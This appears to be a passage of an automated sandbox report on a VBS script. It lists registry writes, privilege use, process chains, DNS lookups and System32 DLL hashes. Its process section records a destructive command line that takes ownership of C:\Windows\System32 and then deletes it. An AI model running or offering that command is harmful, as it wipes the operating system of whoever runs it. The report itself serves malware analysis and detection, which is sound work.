Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\backgroundTaskHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\MuiCache C:\Windows\system32\backgroundTaskHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2992 wrote to memory of 5356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2992 wrote to memory of 5356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5356 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5356 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5356 wrote to memory of 1960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 5356 wrote to memory of 1960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32 /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /t

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Windows\System32\TextShaping.dll

MD5 4c528ae5d512e3901bacaa5d75240381
SHA1 c0222e0ed87b618a16564dadd485ce3a80b762e2
SHA256 b51bbe4c3d01ed3ecb8947c7cce071022149496d713e65e5a30cacaa82b7681e
SHA512 43dc844946160dd36cab13ee963b51a3af7d78fa07b46550cc7b4a6a68f1fc28efb9fc83729c5ddf4ef1c97b89e47a6735d8c13211e28c3a3d9a3fb895fa420a

C:\Windows\System32\ws2_32.dll

MD5 6eed88c1206032a2797abf131c6242cf
SHA1 2865c9ad28810c59f5eeed6f894467c9eb2c4ee8
SHA256 1f996574f38219cdd848375f517f8d86e17542bc84d64cce63aa0c64cc15f22d
SHA512 26ff0c48ce331e4d60b1933bc04043a5c5b761e2202652acee27c48a567ff25d11f3a0a49327e9f2d02bd656ce94506a5ff5880bb9ba07878e84784843bda4a6

C:\Windows\System32\ntmarta.dll

MD5 3847505289cb4d4454f8dc5a866338a8
SHA1 5a5db0243ff6c10865b1301712647bbb416d2b07
SHA256 b2eb064f3d70f08152e1845fbeef64be204fa44fa56d2e58a645e15db5505011
SHA512 776307a08c3d76216d69253c11b18ffffebbe872baa7574d96f79597370ead896d6e5ce3325a0f396bd5741c5afe90c60bf1aa3088146a439410043ab06f432f

C:\Windows\System32\CoreMessaging.dll

MD5 724677d5055d40798db093c26cefd179
SHA1 af685e51f87375125126fd6eaa67ad46eb519859
SHA256 c01c15c82a8568ba99bf193fbc4893d990102b0cbaafe04f4f02b9fe44ae6c76
SHA512 ffc56a4984c2eb7acd55531027c0559689305f4b5b9755e1c0338974bd4411f60a4bde16805e68005bbda96d491af8b70a4cdbfafc613978c72baacd3a3e56c6

C:\Windows\System32\CoreUIComponents.dll

MD5 556f907cce760f3589c953b34d98caba
SHA1 973210ee7824101e08ab1e166e2195b764993bf7
SHA256 27f6f85cce6be7a0127deca777e11f3adb4813b5182c287efdbdd74c0952a339
SHA512 2d1dfc5cb6d98bc005845fce619d593525f5acab9699defae8391009fb9164d550502c713031f553c2546ba90690c90828fc9ff7881407f03644a2bbacc0ace4

C:\Windows\System32\TextInputFramework.dll

MD5 c311e8923432d9d69ad118e1ff6501ce
SHA1 692b75a57c033b45c65272247ae7dd2061092ef3
SHA256 344dcbf81e506ad32561bee96221a601c2e714d136c6d0d8a2e03db8e2dc0e9b
SHA512 b629453abe584cb69c79072eef6c59a8b20cecdeb4bfcf0a2a709f135eb16612f8eb81039adc82669fadc41240ef64d1c7fc4025d3a600ffd7a3a85ff05cdf01

C:\Windows\System32\Windows.Web.dll

MD5 0e96fbf3f55bb988eda407e868c17ed3
SHA1 cd9ecc3a8b2984eb543cd1f7e10c9578b61619f4
SHA256 c5dbbfa0ff7d1c08ec9698e3e2d59634168c497dbda63a3734fb68973b999ac8
SHA512 493eec4a6da4678eb145beca6b9d6f78a3a9068ff20c428428331c635a1c25a2d21f204718a029f33a01c4a2bb702b29210acaab8dcb73b1d477749fdd35e6c7

C:\Windows\System32\OnDemandConnRouteHelper.dll

MD5 1f009de6a013a282d07436241512c056
SHA1 f0d37e1e76a199135e00c0a36b154b191a0950a9
SHA256 c897c345c3bcf3e96589a0feeea8b6d26cf33c091ac3ee2162dd27f8a79c3ff5
SHA512 57971d5df5bd9fad066378b280898e1f6e074805cc765448b99409550f97d74bf5bbd11e48e28e53f22be69cd9cd0ff58caa1e92f94fed7cbb4cd45c8f0c4d37

C:\Windows\System32\FWPUCLNT.DLL

MD5 b776a9db3a6d407d1dbd5d7af94f2294
SHA1 82e2e70dda3c8890ec7ab94a391e886afddeee09
SHA256 aaf5b3a2618636ad22724a37a56d325ef2b4c873e046dcb24cbfda8a34b15ad4
SHA512 ba002d9e7ab6634cb89ddb17d1edc0b7efd5f87a1200f313cb848ae777bb907952eaacb19b2889b0184d144e7ba8e07174b4677eac4b18bf2a0d2e9962193876

C:\Windows\System32\ntdll.dll

MD5 47ccb0e28d73f695c5d5266ffbb300ec
SHA1 63e6167944df951ad2d279d0b64e37bf2f604c07
SHA256 12d1bac765448db638adc8327de1101e5e2eb5829b8da7edd5b216a45c717eec
SHA512 8219f5cfd7a6bf28b8880529240e0b49a2fd78c0c5227cf6471cbf153fd32b2664ae31396d4b6897c2686e5b7826b9f9dad434e82e7032c7a5aa3ee9b2771145

C:\Windows\System32\BCP47Langs.dll

MD5 bfbd39131ba2666075d7c20ba46972fe
SHA1 66c3f540b52b101893d4ce046763817d44beed88
SHA256 cbd179179f1d6e4c34c25abca5999cf5c2b468ba267b5c32663451991452afce
SHA512 111cbc28a4792b7a461fbf1dba0286c58e8aeeae80958e30827d475784eccbff670d424cb7cb610c44c2473b7df7d3ac61cdbda43ffe64d710a2795a6f4f9620

C:\Windows\System32\Windows.Globalization.dll

MD5 c4380ccd6a91a93a8e80bf89776f8851
SHA1 4e97fa0e4a7cb6839bc0a36f0201715be3f2571b
SHA256 48ed1080edea0f01223ef21cbf3b29c96352b649d8995d19722c59d5ad713301
SHA512 217d2d288e10635335fee5f13cb0c1703672bc0ac5f08cfb2f5e3f285ec8529e91e4776c7094a40268495ab044e61b85c14ea5f235a847d7b9ab2b9234353f3a

C:\Windows\System32\iertutil.dll

MD5 41f1fc3ccd219c58d2ed91a0213f6693
SHA1 72bb4bbf5dbe64993cd005407c565264a7388879
SHA256 a40de7fda4a60b9315d1a50453eb2eac2e3e720490239510e213b0e9959db76c
SHA512 cdede15a88103a4922c932b0a0208b32da88b51fcb2a1cb87db237b413cc42821705ed29f253827af7e4cb435ca8886b8bbec2b97240ffa100cba880a584b56d

C:\Windows\System32\uxtheme.dll

MD5 77b94683930015f413c0479f4f21e8f6
SHA1 e5703d9697da0d23023980847a48eb3e49f22458
SHA256 8080001033997f644aceb6a08c9a8fb445a9e338ec3202fa819936dc71f06367
SHA512 57ca6c40b9c5848fc5aa5e3df73249af41dfb09e3b84309807b6a84385cf7d4324cf831872e42ce456fc1302eccde3aeef8feebb57aa451811540fac25545924

C:\Windows\System32\Windows.Services.TargetedContent.dll

MD5 f9a5fbcf0af5f280e5e66bb76961cd2f
SHA1 78a7b1ceb6cbd72e06d48a0bef9d3facf028d8bf
SHA256 073703495bf52dbd3e5b174bb5a2ab02f36b8b73ff387fd7c5d2879a829fec00
SHA512 3e8cde5ea4883a47f6ed0f08c8e093859896cef776eee552acbc17e4b34395c007e3be875f67eda1cc4aa9ccd12d286a417a9aa4fdf4629a212c983ea5e29a72

C:\Windows\System32\profapi.dll

MD5 4a7468ff74f0114626b2f7d1dd5d9fc7
SHA1 0094c51ce445d9986ad3a74959c47c7ec4e25504
SHA256 313cb7c9a69d5d84308a1c4b78c8ff257854071cac7918bc31d1b893feb95ec2
SHA512 f9ee2bdb3158ea7920e241b192a62c5bc3ef612b171bc75e085019e3a2139a5987b2c280cbccc49900695cb667887ac5229506d314d492e4039a9d28027d89f0

C:\Windows\System32\profext.dll

MD5 a5a2db4e33eba0b1387aefb0a6cd0574
SHA1 bc4916d5a5c053fa0ee01e341d4962cd7049e6bf
SHA256 43fd290cbb3b4507e6eaac48c4fd13975252c6b388c9affa7808b1d23c212b04
SHA512 52195b797ea4e27c26e709b90b4fb70ea83745774607aedf23a0fd0e79a7ff8ea7423f7884675b6008fe1195d6fb5f7349b78297e4e3030f720256ef8a38fab8

C:\Windows\System32\userenv.dll

MD5 6331627f363f17f1b1d28c4fe3fb433b
SHA1 31ab07ef67ba94c1d219235ca7db246b3d0f2fe2
SHA256 de6f6cd7d703dca17c147b358fb0ded9b763c5642c56dca0280204a8d3e2cdc3
SHA512 26affaf64593cd41b970310f91f9ba445d78a01afe373bef6c644c9eb6357671d3a6c1e210981ac43eb1d0d3d33687595885f52c37dfc2d47e6930fa65a9531f

C:\Windows\System32\bcrypt.dll

MD5 a4be5153c4441ffeda74aa99d4b2e830
SHA1 fb5de507fc8cc3622d225cb3f5e551c98dc10b51
SHA256 0f14bb6286686143d6192376c2f965d7e71a0c3fae73773da56a7fcd5e355f4d
SHA512 a2e1bee101cf045875654be42366ac02dd06a3aa4d85495290b99bb60c5b3a7aaaa39dc17e7823a07d08bbc4757b49062a2682573325dd9315dae6c393b07aad

C:\Windows\System32\threadpoolwinrt.dll

MD5 a0dea5c1f4ad089439054c8c0ae8c8ea
SHA1 5f7f1fb7dc8822573ba9130fc5395ea8d94d0258
SHA256 192e53a11e563333ea528dd2682bf97690f7d9b4b15dfb8fd111a39980a513ec
SHA512 e3632430f46fe2cda4f7db81e93deb0bc9b1ebb8ffd25d6fee5a3bdf3c8036c0d1374b729c06ed42c91aee2f6b34765d1552ee8ece357753ec984bd64a6aaee5

C:\Windows\System32\logoncli.dll

MD5 5bb04a7a8c4035ec97eb0acc36e6fee4
SHA1 16cb991a12c1a1d93eb5ff5293b6048c2350e04a
SHA256 b84469293584b8ff2c0340f48535227d4c383d558bcc30d6e16a292d26f51cb5
SHA512 b8d6f3baa6d7694d4c730f36e236c5ee5606479116e86177d36ab22bae460a85e26239a4619c0f1622b2bb6ebe2918f3a85844a043dd868709918c19e871d0b5

C:\Windows\System32\Windows.Storage.ApplicationData.dll

MD5 7bc1a26dd9bd33c8849559fd0d2f7239
SHA1 42e6793f073211ab3921756358df719c104516cd
SHA256 febb8ae767b2e5d305f4af6a15ea54aedbf0901dac925382b387eda187cf596d
SHA512 43ad5a310a73651581faad312cf83909ea1e9b43b4cb0f8a9a787b3791433c980133ad68e04be029991eaaf8803a6ef3f3f00c9a512ca54168692a336d995f1e

C:\Windows\System32\cryptsp.dll

MD5 a26d9bd5fe9f31f2d47f81ef95876749
SHA1 03aaa61cfdd8c9830383dee534fc984ef0b815f7
SHA256 82027b8c6ce412f9c9731af5e904291dae944c3845ebfef2af86c8543c8ad5a7
SHA512 8fbe40e851826646bef6e3becc5a5a8ad64bf0e1f3c4c77c133a76491401fc0906d442f41a0c609b7f6c5ffb8cd2a8c9eddd63c135ed38de7d6b81b7d288b2c5

C:\Windows\System32\dsreg.dll

MD5 820b56add74a9ed99409a93f36796f3f
SHA1 04de71d9696c72d559c7203bda715aed223e9a31
SHA256 7fdba9b0590474274895252dc78675b7f8eacda80baf211f45a7d9ab9801b42e
SHA512 63417d78ca32b2e94973ce97d2d9ca08f192411be758823c7a2cac4980dfdffa0150c94b442d484f3c5d65eb5937cd0b5d60a14dbea84248da1e973e1fc7292b

C:\Windows\System32\propsys.dll

MD5 b5b4006acf4d06112dec1d2d3e86c431
SHA1 0fe3f7f5ad40e9b902f4438f55cdcfd9fcdb5cb0
SHA256 bf1a5b4b8178c8092347e0c977e0b1bc11a287f703d5ecf68575589ddc6655f8
SHA512 0249f9fff40a135356120e9a7eb8ae3db0904ba0554bda125b20c264c1e93f4960fd713b7ca8d7c02202034ef0d0bd623bdf558834ed21ad5630f36036b38f45

C:\Windows\System32\cfgmgr32.dll

MD5 1aeb3524cc1162f97a87ee77810d0c1f
SHA1 bae55961b55a36ff0b74edced581219c1d0d9c0b
SHA256 cb82c3b7c8734e891ddcb08c7890599e563498bcb645bb15cbf819fe8a88e3d4
SHA512 8afeb136712197a3285c96caccb0e6aff53fc7bb25e82f3cc31911b6d14e4fe5f72418d69ae88c3b3da36759a1c00c54afc6c01b7536f5033dfbea76ea7bcbf0

C:\Windows\System32\umpdc.dll

MD5 8cdd866e0707a71952fba8be899b7512
SHA1 25635102c3159c4ca42e802492fea502316054ba
SHA256 ab37401f78b29cc26db5b27b3dc0cec3c37ce99ad4e9df6ebb54f4a239f30232
SHA512 51225b22a143fb390116112499e5c10c2ffabcc1c582a0f8e04d7c913cfcb75f79bb1dcb5310408dce81389c22dec00eef5bb4df6fcf4c7c76de141ef8ef28f9

C:\Windows\System32\sppc.dll

MD5 1a344a53306779abd7a3242f7521ca19
SHA1 93105d0b684532fd5ae8f302497beec84891087a
SHA256 63acba2d7b1e0ff51b1fb5eddac20b89e7d47051a4d7e3180da4f99ecca8ae32
SHA512 d622a97d475094d0043b49bd34ebb8a1ee7f89701715ad147f172a6809dedb8d11331ae11a860dbcbe108dcfc643f5d6f5673b2b8847c9ff1e03dc06a70fdf43

C:\Windows\System32\crypt32.dll

MD5 b7c42e5bcdc5bf82b294171a22654473
SHA1 3b0075817ac0a6c38b403d5b19ddf919f96a19f2
SHA256 751b8a2acedbc7c735146272e985d121e17936383c5ca1f326cca3bd64113b01
SHA512 263337d0d3b4d2fb58b91ea3563d06b322a4c369f0c0500e2a19c370a9dc0463d67d57857a28dc0e15f81635af17503285aa4fb08a5d8b40199610e4eae5f503

C:\Windows\System32\msvcp110_win.dll

MD5 f084efcd67d2deee55137ee8fdfce0a9
SHA1 b6313cbcf5a220efae747eb19ecc5f116cdeeeda
SHA256 625cf50cd7fcd0e16d0e28514e92919b6ebfb9cb07cd1803110fdb0f5368aca4
SHA512 11dc12e31838a05dfab4bd0f8e3a07e5ab6a1950ff780049ea7cefdceb14df92b6de2c9e8c8153f036b7bb19ff96a3da343a7ae9d97c5479ff3e07d47ff022d0

C:\Windows\System32\wincorlib.dll

MD5 61f81db6484c0e94820ad6f8bba5a03f
SHA1 167e549bf81e0c9d27f8481ce4904d8627549e1e
SHA256 d8dcc13ee3c37d6412c120a6370a15ca3d103571f7681fefb06709d8191f95a3
SHA512 7634db3a104d3ad4ef9970cc506111d58c5ff39f9affc27abeab6556b1c1dfd4b0e2e7580e9410c2520cf6cc3d75f8f8e9c0bfd8f2980cec8dcec88e6a7b68e3

C:\Windows\System32\cdp.dll

MD5 6517f92fb018d4ad823ac6f468129ebd
SHA1 6975e2a549127ac9016ec4697213fddfff518db2
SHA256 e88d8f8c3a4d1e836e1b8bc802dae6acd04c655f371ae9976e1ca7e45faf5921
SHA512 47458c9d20218c21a841ae32d418a3a038cad355a3fc779e1ec950c618acaa68b13cb3c2d79d5f34bd1c46eff5aa3494fac0eadb1faf8b9730fba0edaee38f56

C:\Windows\System32\wldp.dll

MD5 61f961a945669430557457615cf53493
SHA1 5b12fca5bf3ee6d0bafc18f96dc81604bb95de4a
SHA256 08225860b8e9b712439cd83bc3a04fa802c56c5fa6c2471f23e0047ac639f1f5
SHA512 a89e09a2897e496b39ca6f6b30e4545c195b4524936b4b184fe2a65aac1901de6c522c1eb573954b4279c008e2b7c030249f87f327379735c393ac4e44cff6a2

C:\Windows\System32\slc.dll

MD5 4f6f869094d632eb65e88ca037986aa3
SHA1 681b0201ca12047db8768462497be8aba49fea29
SHA256 a68d1f8265d6a1175e55283a6f57b96ac94bad9585d19d3d56f8d2c6d4c92df4
SHA512 1d292560d7c91c4922113181ae757f15e61c43edda5daa68e83f946c9abe5d05272adcb88a2e90592adb002148a6cf924c0478c4008edd4addf56d6d3f4e3f3e

C:\Windows\System32\policymanager.dll

MD5 1500d26519d73ae1b997421081459a38
SHA1 5d1dead9ef60c8b47ffbace82794a8d6a2be29ee
SHA256 52fa7c1da3158a75ead78d2e011cdf98031e25521b5b369d23b2c3a53365264b
SHA512 4cb99bbbdc8b3ecf200aff69e4dd8a82b590848da238d37c2e44e30366a821275c43e567043eb2dd068d494da464dcb7b3816d04f044743718ec6b5f353e8eef

C:\Windows\System32\sspicli.dll

MD5 956ad5a3683b1d05ecb2927114682495
SHA1 1c241020754267181dd501949e0d43f35f0a4d10
SHA256 74542c85c237583a61bfd6296e7610da2973872645ddc614ad837705d9c4ac72
SHA512 39b691f216778a42eb8351cf84222c42d8bee81ad5ddaa480dddff36c419778abd63d08cc09a431df18b37fca4f98af104dc8ab7967b5864c90b77474f377a94

C:\Windows\System32\advapi32.dll

MD5 e70a1568a400e71a8e644652fca4c925
SHA1 6cc13f29c70b41326832b2145e134568e5d9a3a7
SHA256 e92f9f71ba5a405c5d1a51bd03d6f830f004aca05b80b5bcf525514eca4480ef
SHA512 55863e94e2215b3016df306915bfdbf85486948cd6b1f08e924b7f14539f1ad8fe9a8bd88226fb73f2ce2811196bf48cbff05ecdb8fb3e6ca7cf22f28451fa67

C:\Windows\System32\Windows.StateRepositoryCore.dll

MD5 33ec12ec93e56828f391399b70c313cc
SHA1 d3517663c67a63872da7ddcd93c13909d7a8d384
SHA256 25970a13ecb42814709f5a17c3e41f389dc27f33e0e7a46300e47f5af2fa0f5c
SHA512 4b1314c365f92c5e9881afe27f49b8ec9251c3810aaf34202ef6839bd74a31d8c20545ad414f9eae239a43bbd0d1f3a9deadcf08f83e45ecce54455885b62758

C:\Windows\System32\oleaut32.dll

MD5 eab5aded2242feaee371ed5cab6ea919
SHA1 d9d46f3be08dd8b988b873c4e034c622bc0fb119
SHA256 bbe70836e44ba71555906d37011ec2aa3f86bd1314f5431406bba8f305dfb570
SHA512 44debfc49043003a3e95af09e6687783c55f31009fa4d156218f70fc4ec41f1f086aa1eaa2a5b044f8d1982554a3be525625c28ca617b9db19f0558b27559c7c

C:\Windows\System32\biwinrt.dll

MD5 7c2e41da3cebbce1706bf883c1a55a0b
SHA1 16b3fd17ee2ad8d3abe161735e972babdd76fdb5
SHA256 3b7c5fd6920f53c0aabf31e990c4274a98f094ab2d304a0a46329e2fcca16b43
SHA512 e6a0f16a8e555dad01c5424de8617211acacfd1673660bc9004dff06e674f28ba88e3fe0a7ee8ddccee0eb713de16beea820fe066a894c648d6c82fa933a6609

C:\Windows\System32\OneCoreUAPCommonProxyStub.dll

MD5 5af757db7d611890257f5066af309e9d
SHA1 d0d1371afd887a1646131c70964fb2d735904519
SHA256 503ef212dbb78c886aacd2ea956004bf213061761d0174e3711a626f9d774471
SHA512 13f3430bb5d331f879cbaeea3e2ebe67bdec53dafe35596c828063e98d137786149bcd09c16f4911b430ad7ce697ae2c40fdcf2f9e6cc9bede52adc1ce82bde0

C:\Windows\System32\MrmCoreR.dll

MD5 dccfefcfc583aed573452b4168363620
SHA1 3422aeb088d5eaba6d616313d8c5fe0c8f58c376
SHA256 50822375d13f39dfbb3528025d9faa98f22836f97d11f6e0e7b447ef9e4534df
SHA512 a3ea0279add3964f2166af0963e7edb5a298afef7b03006ee55433cef774f1fef82d0545c2bf04ea7ebf9d1d7fa17f845b73ecba483cac5ba2f891e6c54f0d6c

C:\Windows\System32\imm32.dll

MD5 669d9741e74156425354ddab8bcc581e
SHA1 3384654e76559fc6900e58296967ed89757ba8c9
SHA256 00053aa7be3825828ad7c8c1c9f9ad29df07f5538107479886d8427df86bb4f0
SHA512 b520fdae3489202e532e11c73309f5b2a960f202a5872d25377ee2622846066eaff54fca61930426250787e55f243e30430dd6d3ffad004e318c6e6ed597921e

C:\Windows\System32\gdi32full.dll

MD5 35e1a13f6a0902b4c89f59c89b355c86
SHA1 0375b9e121f10c2d201c2f49c1c014723ccfcacd
SHA256 f2f28c7195557af1e6d50016b41839514ea2dcd4716c5c5bb87dd2c200e5499e
SHA512 de155aceace2ebd4a4421eca43a4787faef8371ff0349a3861c480ab7ee56ae43169e34600ad1d52d0342c71dd247d0a589f6ee96cf93c77394c92e88f58cc78

C:\Windows\System32\gdi32.dll

MD5 f1590bdb1c95293cd3b487ffc97353e0
SHA1 9b3c7713828bda35bb3e4f30a56d61a2c19811dc
SHA256 de75aea74bf6453f42f02b949a6a3dc00ecef4ae16310fc4a0acb6d869e1fd2a
SHA512 5be29ebe010ee79508f806680fb60851d90262877c3f9c24ab56aea3e3d5e0428764f364b0ec592fd7c3daabdf82976ee4f6530902c99eacef4a3c396952fbab

C:\Windows\System32\win32u.dll

MD5 1fb6e05a75de3ac92adfdbf8f8dd2bae
SHA1 5627fd2027f52276b790c2c4a6ac39b5f370728b
SHA256 f9f54817d8174c8cefecbb36c1c001d8a088bfd87d769d38f2dd0b5108c668ac
SHA512 a26f4a1583e77e0d2b8085813b40b17e5e007dde602f92a1e0d736c41b1adf56bfa0a5bd4715dd281cf7acc33d034b8dcccdbf71ceddca8a8082368181881eb4

C:\Windows\System32\user32.dll

MD5 f804d60514ec31233e6df99949b7ff1e
SHA1 96d48b58e741a33d6729d4d2ae57f7f52a0d4961
SHA256 a1331a9b4c8cca6ccdda97efa7b57fe249cb1753b0ee9c212a41856866c21b23
SHA512 fa60f5ea399a316946dd35c0c346ff6cf19e76d905055f4473f11edd47dae937efe2482ef4a0bb435aaf68d4aa29ead23c538231f66d2a58499d79547341f58a

C:\Windows\System32\SHCore.dll

MD5 ab4b87457d2b08b7c51b136c05bfed27
SHA1 3fab36a2f84c75232115d3f253c1a9e7f087e7b5
SHA256 79e0e627e4e8b0a34375db8c71592977538e9743cc67adf88c615157a0e86b00
SHA512 37e8d142ecb1112b25e54cdd10a56b972a435397f2c6dfbb209331181eab68db997a3d2a781581d4b59a66d87ccd22e02300a4112a6223f29fe72e860cd2c4aa

C:\Windows\System32\WinTypes.dll

MD5 67970fe93f3437104cded90945141539
SHA1 e2fbcbb3a26ffad184727275fe2753a8c1ca30e6
SHA256 62a4076211bae3db99472ceb1b0af23dfca8aacd618a3b72420182bb0c7ab2c2
SHA512 43896a744ef8321ed3161bbf55117206eddbb0948e551d112ef028759ebc5b56b78012458dcb98a324bd6ba52c2ab5b063ddc7417bf2b92179e829898c724487

C:\Windows\System32\msvcp_win.dll

MD5 34692d0bde33641b576c32165fbaaf6d
SHA1 09c6a238c7b2936207f261562079a327aa9ff34e
SHA256 fd1d0cc8a5ac8bf20af9e1a7ec360dd76dc022dfe992556948df1c17f7a714d2
SHA512 7d65519f50fd61b08fe7f676ff98a526c469dfc045c15a92c13d2e2227d41cf2c5fd4bbff4d15a6da22840be4bd7ed02fc03bf96905787e7356eaa0066bbbe47

C:\Windows\System32\sechost.dll

MD5 e127fce942c28931ded1442a1f2e84bb
SHA1 2afe30f581351040cf0f6c721fcd33cc285158e9
SHA256 f900de6143d808a03584075417940c5d42bcf612811a19129059a696be8645d7
SHA512 c6eea30c104cf775a2732492226570bd9cecd65efbfc8f33ac9fae1c2584f8bc0a3121b5dc3566049a8f12aa1260ed002ce39d8b0c996a17c139960d1b20c248

C:\Windows\System32\twinapi.appcore.dll

MD5 17bfa6a3976985873eac662f03341cec
SHA1 a06acef0a8fac114709f9fa61ed079724559bd9b
SHA256 73dcb1aee444575b40f189b90af2058664a4ed5e1bfc6f13f5ed925550292732
SHA512 19953627c1bdb87581d18cf0ed85b5091a2c42a43ad115d2d72a13d609f36bfacfb25e3a560e7f6be975021bf091ecc3672a5e8f97f35bc61ee8e59f6fdfcc26

C:\Windows\System32\bcryptprimitives.dll

MD5 5204c0caa08dfe32b8423136f5f5668b
SHA1 ab5211d347e77cbbc1e732106f32de3de8307bef
SHA256 cfbfc6e742fbba525b49fc1d650003ca4fea1ae632c3d265ea008f3d6eae5d0d
SHA512 943d0406ed16b0cf4b34d47188988d7c8235e431a4cf17e1f5fa11c032f66ea575e54c404fb944f7edc595ead9487934333e5db8c10a494437356820d2c24dbd

C:\Windows\System32\kernel.appcore.dll

MD5 af68fddb20df61ece812b542176949e4
SHA1 cdba1cc8fd390b4f8101b5a22b0aa0ba5605c7db
SHA256 7d6c60195dfb05eec27377ae25d9ad259d7fdf85fa71d2aa855fd4129c2aadc2
SHA512 dbc0b91ac07a640f2c8e6bbb76d95b29199970d282be1aaf9d31e965a3d071440da55862d5f949349a92f86cd3e7a69d9b3cc346fae7fb67089af99f3b038bee

C:\Windows\System32\rpcrt4.dll

MD5 dc0b01c678d532758d2b1fac1566f89b
SHA1 b35fdb8d452e39cdf4393c09530837eff01d33c7
SHA256 c84bbd6d2e4f0334d75d6199133515fce3d44439062095f0dcfd1f8df0f5183b
SHA512 7a898d3ef8ade5047ebe59ba1aa3a82ccd6ac0d12ec0828726dc49ee2791c2c12188052893e208374040c64f26c905fa08363740327735becf9b2fd79e3792f0

C:\Windows\System32\ucrtbase.dll

MD5 2c8fe06966d5085a595ffa3c98fe3098
SHA1 e82945e3e63ffef0974d6dd74f2aef2bf6d0a908
SHA256 de8d08d01291df93821314176381f3d1ae863e6c5584a7f8ea42f0b94b15ef65
SHA512 fb08838983c16082a362b3fc89d5b82e61ae629207c13c3cb76b8a0af557ad95c842ce5197ae458b5af61e5449cbab579f509fa72866308aa6fbd3d751522d0f

C:\Windows\System32\combase.dll

MD5 b1e221f0f19f7a1e56cddc254e8ca5c7
SHA1 490c54ab441f11b64dda968bba5523b9cf87176e
SHA256 4d4f893a1e260c4e9e286eb9ab4ac3e9b356495da05b691fc40e65056767a7ab
SHA512 58134ac9cffbb08b24efea681138d53489f7d511ec4098d33bb7b003968e851b5bf17b84f85b83b56407682ca0bc2354a8e388f05da1a9a24435490fda5b3977

C:\Windows\System32\msvcrt.dll

MD5 a4f2d5942fb447cd48a5cee414983e85
SHA1 5aff4cfdee689f127df3c555281dc629d4d62318
SHA256 dd7c8bc34cdbe30ef921395e874909bbf6be53803822164f75f7207e9f085650
SHA512 c464ddc6aee00721fac488256f4ad643634c439558b9ab5f974be9633961a69c99830a308aabeb91e930ddf0d527cd0d328a9aebf1fc2e807dfa2cf02abec3bd

C:\Windows\System32\KernelBase.dll

MD5 957a7c72c0ad30d568e04fce3313082f
SHA1 1919c89186b1e3b4da4aea812ea43f02eac28cd6
SHA256 79eadbc61d0762e6931ee5e49007898596ece6bc2a61c080ada7a2c70992d6e6
SHA512 cbdf38944b7d7132e7c7448bc715e1e94b1a9a97a6108d90c44fd5637c19dbf39969ee69a170525a2c920b6cb67941f79e8ca818c3e4e2ffbbe3ea90fa0f7d7b

C:\Windows\System32\kernel32.dll

MD5 1b6d9bd5677f3fe825a7c393ec60dc64
SHA1 095de4ddb7bb0b3a20918ce78083382ca2eef872
SHA256 e5988a4597838f07fff021dd6c1653a8a459ed6caf2a63da95ec42ab49d37e0d
